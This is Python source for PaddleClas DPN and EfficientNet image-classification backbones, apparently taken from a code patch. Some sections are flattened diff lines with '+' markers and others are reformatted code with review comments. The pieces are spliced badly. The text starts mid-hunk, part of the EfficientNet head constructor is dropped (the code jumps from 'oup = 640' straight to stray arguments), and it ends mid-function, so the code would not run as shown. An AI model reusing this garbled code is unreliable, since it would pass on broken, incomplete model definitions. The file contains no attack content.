1 + self.has_proj = False + else: + print("not implemented now!!!") + sys.exit(1) + + data_in_ch = sum(num_channels) if isinstance(num_channels, + list) else num_channels + + if self.has_proj: + self.c1x1_w_func = BNACConvLayer( + num_channels=data_in_ch, + num_filters=num_1x1_c + 2 * inc, + filter_size=(1, 1), + pad=(0, 0), + stride=(key_stride, key_stride), + name=name + "_match") + + self.c1x1_a_func = BNACConvLayer( + num_channels=data_in_ch, + num_filters=num_1x1_a, + filter_size=(1, 1), + pad=(0, 0), + name=name + "_conv1") + + self.c3x3_b_func = BNACConvLayer( + num_channels=num_1x1_a, + num_filters=num_3x3_b, + filter_size=(kw, kh), + pad=(pw, ph), + stride=(key_stride, key_stride), + groups=G, + name=name + "_conv2") + + self.c1x1_c_func = BNACConvLayer( + num_channels=num_3x3_b, + num_filters=num_1x1_c + inc, + filter_size=(1, 1), + pad=(0, 0), + name=name + "_conv3") + + def 
class DPN(nn.Layer):
    """Dual Path Network backbone (DPN-68/92/98/107/131)."""

    def __init__(self, layers=68, class_num=1000):
        super(DPN, self).__init__()

        self._class_num = class_num

        args = self.get_net_args(layers)
        bws = args['bw']
        inc_sec = args['inc_sec']
        rs = args['r']
        k_r = args['k_r']
        k_sec = args['k_sec']
        G = args['G']
        init_num_filter = args['init_num_filter']
        init_filter_size = args['init_filter_size']
        init_padding = args['init_padding']

        self.k_sec = k_sec

        self.conv1_x_1_func = ConvBNLayer(
            num_channels=3,
            num_filters=init_num_filter,
            filter_size=init_filter_size,
            stride=2,
            pad=init_padding,
            act='relu',
            name="conv1")

        self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1)

        num_channel_dpn = init_num_filter

        self.dpn_func_list = []
        # conv2 - conv5: four stages, each a 'proj'/'down' unit followed by
        # (k_sec[gc] - 1) 'normal' units. `match_list` tracks the global
        # indices used by the stage-opening units so the sequential numbering
        # of the 'normal' units skips over them.
        match_list, num = [], 0
        for gc in range(4):
            bw = bws[gc]
            inc = inc_sec[gc]
            R = (k_r * bw) // rs[gc]
            if gc == 0:
                _type1 = 'proj'
                _type2 = 'normal'
                match = 1
            else:
                _type1 = 'down'
                _type2 = 'normal'
                match = match + k_sec[gc - 1]
            match_list.append(match)
            self.dpn_func_list.append(
                self.add_sublayer(
                    "dpn{}".format(match),
                    DualPathFactory(
                        num_channels=num_channel_dpn,
                        num_1x1_a=R,
                        num_3x3_b=R,
                        num_1x1_c=bw,
                        inc=inc,
                        G=G,
                        _type=_type1,
                        name="dpn" + str(match))))
            # After the opening unit the stream is [residual, dense] widths.
            num_channel_dpn = [bw, 3 * inc]

            for i_ly in range(2, k_sec[gc] + 1):
                num += 1
                if num in match_list:
                    num += 1
                self.dpn_func_list.append(
                    self.add_sublayer(
                        "dpn{}".format(num),
                        DualPathFactory(
                            num_channels=num_channel_dpn,
                            num_1x1_a=R,
                            num_3x3_b=R,
                            num_1x1_c=bw,
                            inc=inc,
                            G=G,
                            _type=_type2,
                            name="dpn" + str(num))))
                # Dense path grows by `inc` channels per unit.
                num_channel_dpn = [
                    num_channel_dpn[0], num_channel_dpn[1] + inc
                ]

        out_channel = sum(num_channel_dpn)

        self.conv5_x_x_bn = BatchNorm(
            num_channels=sum(num_channel_dpn),
            act="relu",
            param_attr=ParamAttr(name='final_concat_bn_scale'),
            bias_attr=ParamAttr('final_concat_bn_offset'),
            moving_mean_name='final_concat_bn_mean',
            moving_variance_name='final_concat_bn_variance')

        self.pool2d_avg = AdaptiveAvgPool2D(1)

        stdv = 0.01

        self.out = Linear(
            out_channel,
            class_num,
            weight_attr=ParamAttr(
                initializer=Uniform(-stdv, stdv), name="fc_weights"),
            bias_attr=ParamAttr(name="fc_offset"))

    def forward(self, input):
        conv1_x_1 = self.conv1_x_1_func(input)
        convX_x_x = self.pool2d_max(conv1_x_1)

        dpn_idx = 0
        for gc in range(4):
            convX_x_x = self.dpn_func_list[dpn_idx](convX_x_x)
            dpn_idx += 1
            for i_ly in range(2, self.k_sec[gc] + 1):
                convX_x_x = self.dpn_func_list[dpn_idx](convX_x_x)
                dpn_idx += 1

        # Merge residual and dense paths before the final BN + head.
        conv5_x_x = paddle.concat(convX_x_x, axis=1)
        conv5_x_x = self.conv5_x_x_bn(conv5_x_x)

        y = self.pool2d_avg(conv5_x_x)
        y = paddle.flatten(y, start_axis=1, stop_axis=-1)
        y = self.out(y)
        return y

    def get_net_args(self, layers):
        """Return the hyper-parameter dict for a given depth; raises
        NotImplementedError for unsupported depths."""
        if layers == 68:
            k_r = 128
            G = 32
            k_sec = [3, 4, 12, 3]
            inc_sec = [16, 32, 32, 64]
            bw = [64, 128, 256, 512]
            r = [64, 64, 64, 64]
            init_num_filter = 10
            init_filter_size = 3
            init_padding = 1
        elif layers == 92:
            k_r = 96
            G = 32
            k_sec = [3, 4, 20, 3]
            inc_sec = [16, 32, 24, 128]
            bw = [256, 512, 1024, 2048]
            r = [256, 256, 256, 256]
            init_num_filter = 64
            init_filter_size = 7
            init_padding = 3
        elif layers == 98:
            k_r = 160
            G = 40
            k_sec = [3, 6, 20, 3]
            inc_sec = [16, 32, 32, 128]
            bw = [256, 512, 1024, 2048]
            r = [256, 256, 256, 256]
            init_num_filter = 96
            init_filter_size = 7
            init_padding = 3
        elif layers == 107:
            k_r = 200
            G = 50
            k_sec = [4, 8, 20, 3]
            inc_sec = [20, 64, 64, 128]
            bw = [256, 512, 1024, 2048]
            r = [256, 256, 256, 256]
            init_num_filter = 128
            init_filter_size = 7
            init_padding = 3
        elif layers == 131:
            k_r = 160
            G = 40
            k_sec = [4, 8, 28, 3]
            inc_sec = [16, 32, 32, 128]
            bw = [256, 512, 1024, 2048]
            r = [256, 256, 256, 256]
            init_num_filter = 128
            init_filter_size = 7
            init_padding = 3
        else:
            raise NotImplementedError
        net_arg = {
            'k_r': k_r,
            'G': G,
            'k_sec': k_sec,
            'inc_sec': inc_sec,
            'bw': bw,
            'r': r
        }
        net_arg['init_num_filter'] = init_num_filter
        net_arg['init_filter_size'] = init_filter_size
        net_arg['init_padding'] = init_padding

        return net_arg


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Load weights per `pretrained`: False = none, True = download from
    `model_url`, str = local path. Raises RuntimeError otherwise."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )
# Factories. Fix: each accepted a `use_ssld` argument but silently dropped
# it — `_load_pretrained` was called without forwarding the flag, so SSLD
# pretrained weights could never be requested. Now forwarded.


def DPN68(pretrained=False, use_ssld=False, **kwargs):
    """DPN-68."""
    model = DPN(layers=68, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["DPN68"], use_ssld=use_ssld)
    return model


def DPN92(pretrained=False, use_ssld=False, **kwargs):
    """DPN-92."""
    model = DPN(layers=92, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["DPN92"], use_ssld=use_ssld)
    return model


def DPN98(pretrained=False, use_ssld=False, **kwargs):
    """DPN-98."""
    model = DPN(layers=98, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["DPN98"], use_ssld=use_ssld)
    return model


def DPN107(pretrained=False, use_ssld=False, **kwargs):
    """DPN-107."""
    model = DPN(layers=107, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DPN107"], use_ssld=use_ssld)
    return model


def DPN131(pretrained=False, use_ssld=False, **kwargs):
    """DPN-131."""
    model = DPN(layers=131, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DPN131"], use_ssld=use_ssld)
    return model


# ---------------------------------------------------------------------------
# Patch boundary: new file ppcls/arch/backbone/model_zoo/efficientnet.py
# ---------------------------------------------------------------------------
import paddle
from paddle import ParamAttr
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
import math
import collections
import re
import copy

from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url
"https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB2_pretrained.pdparams", + "EfficientNetB3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB3_pretrained.pdparams", + "EfficientNetB4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB4_pretrained.pdparams", + "EfficientNetB5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB5_pretrained.pdparams", + "EfficientNetB6": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB6_pretrained.pdparams", + "EfficientNetB7": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/EfficientNetB7_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + +GlobalParams = collections.namedtuple('GlobalParams', [ + 'batch_norm_momentum', + 'batch_norm_epsilon', + 'dropout_rate', + 'num_classes', + 'width_coefficient', + 'depth_coefficient', + 'depth_divisor', + 'min_depth', + 'drop_connect_rate', +]) + +BlockArgs = collections.namedtuple('BlockArgs', [ + 'kernel_size', 'num_repeat', 'input_filters', 'output_filters', + 'expand_ratio', 'id_skip', 'stride', 'se_ratio' +]) + +GlobalParams.__new__.__defaults__ = (None, ) * len(GlobalParams._fields) +BlockArgs.__new__.__defaults__ = (None, ) * len(BlockArgs._fields) + + +def efficientnet_params(model_name): + """ Map EfficientNet model name to parameter coefficients. 
""" + params_dict = { + # Coefficients: width,depth,resolution,dropout + 'efficientnet-b0': (1.0, 1.0, 224, 0.2), + 'efficientnet-b1': (1.0, 1.1, 240, 0.2), + 'efficientnet-b2': (1.1, 1.2, 260, 0.3), + 'efficientnet-b3': (1.2, 1.4, 300, 0.3), + 'efficientnet-b4': (1.4, 1.8, 380, 0.4), + 'efficientnet-b5': (1.6, 2.2, 456, 0.4), + 'efficientnet-b6': (1.8, 2.6, 528, 0.5), + 'efficientnet-b7': (2.0, 3.1, 600, 0.5), + } + return params_dict[model_name] + + +def efficientnet(width_coefficient=None, + depth_coefficient=None, + dropout_rate=0.2, + drop_connect_rate=0.2): + """ Get block arguments according to parameter and coefficients. """ + blocks_args = [ + 'r1_k3_s11_e1_i32_o16_se0.25', + 'r2_k3_s22_e6_i16_o24_se0.25', + 'r2_k5_s22_e6_i24_o40_se0.25', + 'r3_k3_s22_e6_i40_o80_se0.25', + 'r3_k5_s11_e6_i80_o112_se0.25', + 'r4_k5_s22_e6_i112_o192_se0.25', + 'r1_k3_s11_e6_i192_o320_se0.25', + ] + blocks_args = BlockDecoder.decode(blocks_args) + + global_params = GlobalParams( + batch_norm_momentum=0.99, + batch_norm_epsilon=1e-3, + dropout_rate=dropout_rate, + drop_connect_rate=drop_connect_rate, + num_classes=1000, + width_coefficient=width_coefficient, + depth_coefficient=depth_coefficient, + depth_divisor=8, + min_depth=None) + + return blocks_args, global_params + + +def get_model_params(model_name, override_params): + """ Get the block args and global params for a given model """ + if model_name.startswith('efficientnet'): + w, d, _, p = efficientnet_params(model_name) + blocks_args, global_params = efficientnet( + width_coefficient=w, depth_coefficient=d, dropout_rate=p) + else: + raise NotImplementedError('model name is not pre-defined: %s' % + model_name) + if override_params: + global_params = global_params._replace(**override_params) + return blocks_args, global_params + + +def round_filters(filters, global_params): + """ Calculate and round number of filters based on depth multiplier. 
""" + multiplier = global_params.width_coefficient + if not multiplier: + return filters + divisor = global_params.depth_divisor + min_depth = global_params.min_depth + filters *= multiplier + min_depth = min_depth or divisor + new_filters = max(min_depth, + int(filters + divisor / 2) // divisor * divisor) + if new_filters < 0.9 * filters: # prevent rounding by more than 10% + new_filters += divisor + return int(new_filters) + + +def round_repeats(repeats, global_params): + """ Round number of filters based on depth multiplier. """ + multiplier = global_params.depth_coefficient + if not multiplier: + return repeats + return int(math.ceil(multiplier * repeats)) + + +class BlockDecoder(object): + """ + Block Decoder, straight from the official TensorFlow repository. + """ + + @staticmethod + def _decode_block_string(block_string): + """ Gets a block through a string notation of arguments. """ + assert isinstance(block_string, str) + + ops = block_string.split('_') + options = {} + for op in ops: + splits = re.split(r'(\d.*)', op) + if len(splits) >= 2: + key, value = splits[:2] + options[key] = value + + # Check stride + cond_1 = ('s' in options and len(options['s']) == 1) + cond_2 = ((len(options['s']) == 2) and + (options['s'][0] == options['s'][1])) + assert (cond_1 or cond_2) + + return BlockArgs( + kernel_size=int(options['k']), + num_repeat=int(options['r']), + input_filters=int(options['i']), + output_filters=int(options['o']), + expand_ratio=int(options['e']), + id_skip=('noskip' not in block_string), + se_ratio=float(options['se']) if 'se' in options else None, + stride=[int(options['s'][0])]) + + @staticmethod + def _encode_block_string(block): + """Encodes a block to a string.""" + args = [ + 'r%d' % block.num_repeat, 'k%d' % block.kernel_size, 's%d%d' % + (block.strides[0], block.strides[1]), 'e%s' % block.expand_ratio, + 'i%d' % block.input_filters, 'o%d' % block.output_filters + ] + if 0 < block.se_ratio <= 1: + args.append('se%s' % block.se_ratio) + if 
block.id_skip is False: + args.append('noskip') + return '_'.join(args) + + @staticmethod + def decode(string_list): + """ + Decode a list of string notations to specify blocks in the network. + + string_list: list of strings, each string is a notation of block + return + list of BlockArgs namedtuples of block args + """ + assert isinstance(string_list, list) + blocks_args = [] + for block_string in string_list: + blocks_args.append(BlockDecoder._decode_block_string(block_string)) + return blocks_args + + @staticmethod + def encode(blocks_args): + """ + Encodes a list of BlockArgs to a list of strings. + + :param blocks_args: a list of BlockArgs namedtuples of block args + :return: a list of strings, each string is a notation of block + """ + block_strings = [] + for block in blocks_args: + block_strings.append(BlockDecoder._encode_block_string(block)) + return block_strings + + +def initial_type(name, use_bias=False): + param_attr = ParamAttr(name=name + "_weights") + if use_bias: + bias_attr = ParamAttr(name=name + "_offset") + else: + bias_attr = False + return param_attr, bias_attr + + +def init_batch_norm_layer(name="batch_norm"): + param_attr = ParamAttr(name=name + "_scale") + bias_attr = ParamAttr(name=name + "_offset") + return param_attr, bias_attr + + +def init_fc_layer(name="fc"): + param_attr = ParamAttr(name=name + "_weights") + bias_attr = ParamAttr(name=name + "_offset") + return param_attr, bias_attr + + +def cal_padding(img_size, stride, filter_size, dilation=1): + """Calculate padding size.""" + if img_size % stride == 0: + out_size = max(filter_size - stride, 0) + else: + out_size = max(filter_size - (img_size % stride), 0) + return out_size // 2, out_size - out_size // 2 + + +inp_shape = { + "b0_small": [224, 112, 112, 56, 28, 14, 14, 7], + "b0": [224, 112, 112, 56, 28, 14, 14, 7], + "b1": [240, 120, 120, 60, 30, 15, 15, 8], + "b2": [260, 130, 130, 65, 33, 17, 17, 9], + "b3": [300, 150, 150, 75, 38, 19, 19, 10], + "b4": [380, 190, 190, 95, 48, 
# Per-variant feature-map sizes at each stage, used to pre-compute static
# SAME padding (index 0 is the input resolution).
inp_shape = {
    "b0_small": [224, 112, 112, 56, 28, 14, 14, 7],
    "b0": [224, 112, 112, 56, 28, 14, 14, 7],
    "b1": [240, 120, 120, 60, 30, 15, 15, 8],
    "b2": [260, 130, 130, 65, 33, 17, 17, 9],
    "b3": [300, 150, 150, 75, 38, 19, 19, 10],
    "b4": [380, 190, 190, 95, 48, 24, 24, 12],
    "b5": [456, 228, 228, 114, 57, 29, 29, 15],
    "b6": [528, 264, 264, 132, 66, 33, 33, 17],
    "b7": [600, 300, 300, 150, 75, 38, 38, 19]
}


def _drop_connect(inputs, prob, is_test):
    """Stochastic depth: randomly zero whole samples with probability `prob`
    at train time (identity at test time)."""
    if is_test:
        return inputs
    keep_prob = 1.0 - prob
    inputs_shape = paddle.shape(inputs)
    # floor(keep_prob + U[0,1)) is a Bernoulli(keep_prob) mask per sample.
    random_tensor = keep_prob + paddle.rand(shape=[inputs_shape[0], 1, 1, 1])
    binary_tensor = paddle.floor(random_tensor)
    return paddle.multiply(inputs, binary_tensor) / keep_prob


class Conv2ds(nn.Layer):
    """Conv2D with TF-style padding modes and an optional fused activation.

    `padding_type` is one of "SAME" (static, computed from the known input
    resolution in `inp_shape`), "VALID", "DYNAMIC", or a literal padding.
    """

    def __init__(self,
                 input_channels,
                 output_channels,
                 filter_size,
                 stride=1,
                 padding=0,
                 groups=None,
                 name="conv2d",
                 act=None,
                 use_bias=False,
                 padding_type=None,
                 model_name=None,
                 cur_stage=None):
        super(Conv2ds, self).__init__()
        assert act in [None, "swish", "sigmoid"]
        self.act = act

        param_attr, bias_attr = initial_type(name=name, use_bias=use_bias)

        def get_padding(filter_size, stride=1, dilation=1):
            padding = ((stride - 1) + dilation * (filter_size - 1)) // 2
            return padding

        # Look up the incoming resolution unless the caller gave no context.
        inps = 1 if model_name == None and cur_stage == None else inp_shape[
            model_name][cur_stage]
        self.need_crop = False
        if padding_type == "SAME":
            top_padding, bottom_padding = cal_padding(inps, stride,
                                                      filter_size)
            left_padding, right_padding = cal_padding(inps, stride,
                                                      filter_size)
            height_padding = bottom_padding
            width_padding = right_padding
            if top_padding != bottom_padding or left_padding != right_padding:
                # Asymmetric SAME padding: over-pad then crop in forward().
                height_padding = top_padding + stride
                width_padding = left_padding + stride
                self.need_crop = True
            padding = [height_padding, width_padding]
        elif padding_type == "VALID":
            height_padding = 0
            width_padding = 0
            padding = [height_padding, width_padding]
        elif padding_type == "DYNAMIC":
            padding = get_padding(filter_size, stride)
        else:
            padding = padding_type

        groups = 1 if groups is None else groups
        self._conv = Conv2D(
            input_channels,
            output_channels,
            filter_size,
            groups=groups,
            stride=stride,
            # act=act,
            padding=padding,
            weight_attr=param_attr,
            bias_attr=bias_attr)

    def forward(self, inputs):
        out = self._conv(inputs)
        if self.act == "swish":
            out = F.swish(out)
        elif self.act == "sigmoid":
            out = F.sigmoid(out)

        if self.need_crop:
            out = out[:, :, 1:, 1:]
        return out


class ConvBNLayer(nn.Layer):
    """Conv2ds optionally followed by BatchNorm with a fused activation."""

    def __init__(self,
                 input_channels,
                 filter_size,
                 output_channels,
                 stride=1,
                 num_groups=1,
                 padding_type="SAME",
                 conv_act=None,
                 bn_act="swish",
                 use_bn=True,
                 use_bias=False,
                 name=None,
                 conv_name=None,
                 bn_name=None,
                 model_name=None,
                 cur_stage=None):
        super(ConvBNLayer, self).__init__()

        self._conv = Conv2ds(
            input_channels=input_channels,
            output_channels=output_channels,
            filter_size=filter_size,
            stride=stride,
            groups=num_groups,
            act=conv_act,
            padding_type=padding_type,
            name=conv_name,
            use_bias=use_bias,
            model_name=model_name,
            cur_stage=cur_stage)
        self.use_bn = use_bn
        if use_bn is True:
            bn_name = name + bn_name
            param_attr, bias_attr = init_batch_norm_layer(bn_name)

            self._bn = BatchNorm(
                num_channels=output_channels,
                act=bn_act,
                momentum=0.99,
                epsilon=0.001,
                moving_mean_name=bn_name + "_mean",
                moving_variance_name=bn_name + "_variance",
                param_attr=param_attr,
                bias_attr=bias_attr)

    def forward(self, inputs):
        if self.use_bn:
            out = self._conv(inputs)
            out = self._bn(out)
            return out
        else:
            return self._conv(inputs)


class ExpandConvNorm(nn.Layer):
    """1x1 expansion conv + BN of an MBConv block; identity when the
    expand ratio is 1."""

    def __init__(self,
                 input_channels,
                 block_args,
                 padding_type,
                 name=None,
                 model_name=None,
                 cur_stage=None):
        super(ExpandConvNorm, self).__init__()

        self.oup = block_args.input_filters * block_args.expand_ratio
        self.expand_ratio = block_args.expand_ratio

        if self.expand_ratio != 1:
            self._conv = ConvBNLayer(
                input_channels,
                1,
                self.oup,
                bn_act=None,
                padding_type=padding_type,
                name=name,
                conv_name=name + "_expand_conv",
                bn_name="_bn0",
                model_name=model_name,
                cur_stage=cur_stage)

    def forward(self, inputs):
        if self.expand_ratio != 1:
            return self._conv(inputs)
        else:
            return inputs
class DepthwiseConvNorm(nn.Layer):
    """Depthwise conv + BN of an MBConv block (groups == channels)."""

    def __init__(self,
                 input_channels,
                 block_args,
                 padding_type,
                 name=None,
                 model_name=None,
                 cur_stage=None):
        super(DepthwiseConvNorm, self).__init__()

        self.k = block_args.kernel_size
        self.s = block_args.stride
        # Stride may be stored as a 1-element list/tuple.
        if isinstance(self.s, list) or isinstance(self.s, tuple):
            self.s = self.s[0]
        oup = block_args.input_filters * block_args.expand_ratio

        self._conv = ConvBNLayer(
            input_channels,
            self.k,
            oup,
            self.s,
            num_groups=input_channels,
            bn_act=None,
            padding_type=padding_type,
            name=name,
            conv_name=name + "_depthwise_conv",
            bn_name="_bn1",
            model_name=model_name,
            cur_stage=cur_stage)

    def forward(self, inputs):
        return self._conv(inputs)


class ProjectConvNorm(nn.Layer):
    """1x1 projection conv + BN down to the block's output width."""

    def __init__(self,
                 input_channels,
                 block_args,
                 padding_type,
                 name=None,
                 model_name=None,
                 cur_stage=None):
        super(ProjectConvNorm, self).__init__()

        final_oup = block_args.output_filters

        self._conv = ConvBNLayer(
            input_channels,
            1,
            final_oup,
            bn_act=None,
            padding_type=padding_type,
            name=name,
            conv_name=name + "_project_conv",
            bn_name="_bn2",
            model_name=model_name,
            cur_stage=cur_stage)

    def forward(self, inputs):
        return self._conv(inputs)


class SEBlock(nn.Layer):
    """Squeeze-and-excitation: global pool -> reduce -> expand -> scale."""

    def __init__(self,
                 input_channels,
                 num_squeezed_channels,
                 oup,
                 padding_type,
                 name=None,
                 model_name=None,
                 cur_stage=None):
        super(SEBlock, self).__init__()

        self._pool = AdaptiveAvgPool2D(1)
        self._conv1 = Conv2ds(
            input_channels,
            num_squeezed_channels,
            1,
            use_bias=True,
            padding_type=padding_type,
            act="swish",
            name=name + "_se_reduce")

        self._conv2 = Conv2ds(
            num_squeezed_channels,
            oup,
            1,
            act="sigmoid",
            use_bias=True,
            padding_type=padding_type,
            name=name + "_se_expand")

    def forward(self, inputs):
        squeezed = self._pool(inputs)
        squeezed = self._conv1(squeezed)
        squeezed = self._conv2(squeezed)
        # Channel-wise gating of the block input.
        return paddle.multiply(inputs, squeezed)


class MbConvBlock(nn.Layer):
    """Mobile inverted bottleneck (MBConv): expand -> depthwise -> SE ->
    project, with an optional drop-connect residual."""

    def __init__(self,
                 input_channels,
                 block_args,
                 padding_type,
                 use_se,
                 name=None,
                 drop_connect_rate=None,
                 model_name=None,
                 cur_stage=None):
        super(MbConvBlock, self).__init__()

        oup = block_args.input_filters * block_args.expand_ratio
        self.block_args = block_args
        self.has_se = use_se and (block_args.se_ratio is not None) and (
            0 < block_args.se_ratio <= 1)
        self.id_skip = block_args.id_skip
        self.expand_ratio = block_args.expand_ratio
        self.drop_connect_rate = drop_connect_rate

        if self.expand_ratio != 1:
            self._ecn = ExpandConvNorm(
                input_channels,
                block_args,
                padding_type=padding_type,
                name=name,
                model_name=model_name,
                cur_stage=cur_stage)

        self._dcn = DepthwiseConvNorm(
            input_channels * block_args.expand_ratio,
            block_args,
            padding_type=padding_type,
            name=name,
            model_name=model_name,
            cur_stage=cur_stage)

        if self.has_se:
            num_squeezed_channels = max(
                1, int(block_args.input_filters * block_args.se_ratio))
            self._se = SEBlock(
                input_channels * block_args.expand_ratio,
                num_squeezed_channels,
                oup,
                padding_type=padding_type,
                name=name,
                model_name=model_name,
                cur_stage=cur_stage)

        self._pcn = ProjectConvNorm(
            input_channels * block_args.expand_ratio,
            block_args,
            padding_type=padding_type,
            name=name,
            model_name=model_name,
            cur_stage=cur_stage)

    def forward(self, inputs):
        out = inputs
        if self.expand_ratio != 1:
            out = self._ecn(out)
            out = F.swish(out)

        out = self._dcn(out)
        out = F.swish(out)
        if self.has_se:
            out = self._se(out)
        out = self._pcn(out)

        # Residual only when shapes match (stride 1, same width).
        if self.id_skip and \
                self.block_args.stride == 1 and \
                self.block_args.input_filters == self.block_args.output_filters:
            if self.drop_connect_rate:
                out = _drop_connect(out, self.drop_connect_rate,
                                    not self.training)
            out = paddle.add(out, inputs)
        return out
class ConvStemNorm(nn.Layer):
    """Stem: 3x3 stride-2 conv + BN producing `round_filters(32, ...)`
    channels."""

    def __init__(self,
                 input_channels,
                 padding_type,
                 _global_params,
                 name=None,
                 model_name=None,
                 cur_stage=None):
        super(ConvStemNorm, self).__init__()

        output_channels = round_filters(32, _global_params)
        self._conv = ConvBNLayer(
            input_channels,
            filter_size=3,
            output_channels=output_channels,
            stride=2,
            bn_act=None,
            padding_type=padding_type,
            name="",
            conv_name="_conv_stem",
            bn_name="_bn0",
            model_name=model_name,
            cur_stage=cur_stage)

    def forward(self, inputs):
        return self._conv(inputs)


class ExtractFeatures(nn.Layer):
    """Stem plus the full sequence of MBConv blocks."""

    def __init__(self,
                 input_channels,
                 _block_args,
                 _global_params,
                 padding_type,
                 use_se,
                 model_name=None):
        super(ExtractFeatures, self).__init__()

        self._global_params = _global_params

        self._conv_stem = ConvStemNorm(
            input_channels,
            padding_type=padding_type,
            _global_params=_global_params,
            model_name=model_name,
            cur_stage=0)

        # First pass: count the total number of blocks after depth scaling,
        # so drop-connect can be ramped linearly over block index.
        self.block_args_copy = copy.deepcopy(_block_args)
        idx = 0
        block_size = 0
        for block_arg in self.block_args_copy:
            block_arg = block_arg._replace(
                input_filters=round_filters(block_arg.input_filters,
                                            _global_params),
                output_filters=round_filters(block_arg.output_filters,
                                             _global_params),
                num_repeat=round_repeats(block_arg.num_repeat, _global_params))
            block_size += 1
            for _ in range(block_arg.num_repeat - 1):
                block_size += 1

        # Second pass: actually build the blocks.
        self.conv_seq = []
        cur_stage = 1
        for block_args in _block_args:
            block_args = block_args._replace(
                input_filters=round_filters(block_args.input_filters,
                                            _global_params),
                output_filters=round_filters(block_args.output_filters,
                                             _global_params),
                num_repeat=round_repeats(block_args.num_repeat,
                                         _global_params))

            drop_connect_rate = self._global_params.drop_connect_rate
            if drop_connect_rate:
                drop_connect_rate *= float(idx) / block_size

            _mc_block = self.add_sublayer(
                "_blocks." + str(idx) + ".",
                MbConvBlock(
                    block_args.input_filters,
                    block_args=block_args,
                    padding_type=padding_type,
                    use_se=use_se,
                    name="_blocks." + str(idx) + ".",
                    drop_connect_rate=drop_connect_rate,
                    model_name=model_name,
                    cur_stage=cur_stage))
            self.conv_seq.append(_mc_block)
            idx += 1
            if block_args.num_repeat > 1:
                block_args = block_args._replace(
                    input_filters=block_args.output_filters, stride=1)
                for _ in range(block_args.num_repeat - 1):
                    drop_connect_rate = self._global_params.drop_connect_rate
                    if drop_connect_rate:
                        drop_connect_rate *= float(idx) / block_size
                    # NOTE(review): sublayer key is "block." here but
                    # "_blocks." above — preserved byte-for-byte from the
                    # original; parameter names come from ParamAttr, so
                    # pretrained loading is unaffected, but confirm upstream.
                    _mc_block = self.add_sublayer(
                        "block." + str(idx) + ".",
                        MbConvBlock(
                            block_args.input_filters,
                            block_args,
                            padding_type=padding_type,
                            use_se=use_se,
                            name="_blocks." + str(idx) + ".",
                            drop_connect_rate=drop_connect_rate,
                            model_name=model_name,
                            cur_stage=cur_stage))
                    self.conv_seq.append(_mc_block)
                    idx += 1
            cur_stage += 1

    def forward(self, inputs):
        out = self._conv_stem(inputs)
        out = F.swish(out)
        for _mc_block in self.conv_seq:
            out = _mc_block(out)
        return out


class EfficientNet(nn.Layer):
    # NOTE(review): this class is truncated by the patch-chunk boundary; the
    # remainder of __init__ (the final ConvBNLayer/pool/fc head) continues in
    # the next hunk and is not reproduced here.
    def __init__(self,
                 name="b0",
                 padding_type="SAME",
                 override_params=None,
                 use_se=True,
                 class_num=1000):
        super(EfficientNet, self).__init__()

        model_name = 'efficientnet-' + name
        self.name = name
        self._block_args, self._global_params = get_model_params(
            model_name, override_params)
        self.padding_type = padding_type
        self.use_se = use_se

        self._ef = ExtractFeatures(
            3,
            self._block_args,
            self._global_params,
            self.padding_type,
            self.use_se,
            model_name=self.name)

        output_channels = round_filters(1280, self._global_params)
        if name == "b0_small" or name == "b0" or name == "b1":
            oup = 320
        elif name == "b2":
            oup = 352
        elif name == "b3":
            oup = 384
        elif name == "b4":
            oup = 448
        elif name == "b5":
            oup = 512
        elif name == "b6":
            oup = 576
        elif name == "b7":
            oup = 640
output_channels, + bn_act="swish", + padding_type=self.padding_type, + name="", + conv_name="_conv_head", + bn_name="_bn1", + model_name=self.name, + cur_stage=7) + self._pool = AdaptiveAvgPool2D(1) + + if self._global_params.dropout_rate: + self._drop = Dropout( + p=self._global_params.dropout_rate, mode="upscale_in_train") + + param_attr, bias_attr = init_fc_layer("_fc") + self._fc = Linear( + output_channels, + class_num, + weight_attr=param_attr, + bias_attr=bias_attr) + + def forward(self, inputs): + x = self._ef(inputs) + x = self._conv(x) + x = self._pool(x) + if self._global_params.dropout_rate: + x = self._drop(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
def _build_efficientnet(arch, url_key, padding_type, override_params, use_se,
                        pretrained, use_ssld, **kwargs):
    """Construct an EfficientNet variant and optionally load pretrained weights.

    Args:
        arch (str): architecture tag passed to EfficientNet (e.g. 'b0').
        url_key (str): key into MODEL_URLS selecting the downloadable weights.
        padding_type (str): conv padding strategy ('SAME' or 'DYNAMIC').
        override_params (dict|None): overrides applied to the global params.
        use_se (bool): whether to insert squeeze-and-excitation blocks.
        pretrained (bool|str): False (no weights), True (download from
            url_key), or a local weights path.
        use_ssld (bool): prefer the SSLD-distilled weights when downloading.

    Returns:
        EfficientNet: the constructed model.
    """
    model = EfficientNet(
        name=arch,
        padding_type=padding_type,
        override_params=override_params,
        use_se=use_se,
        **kwargs)
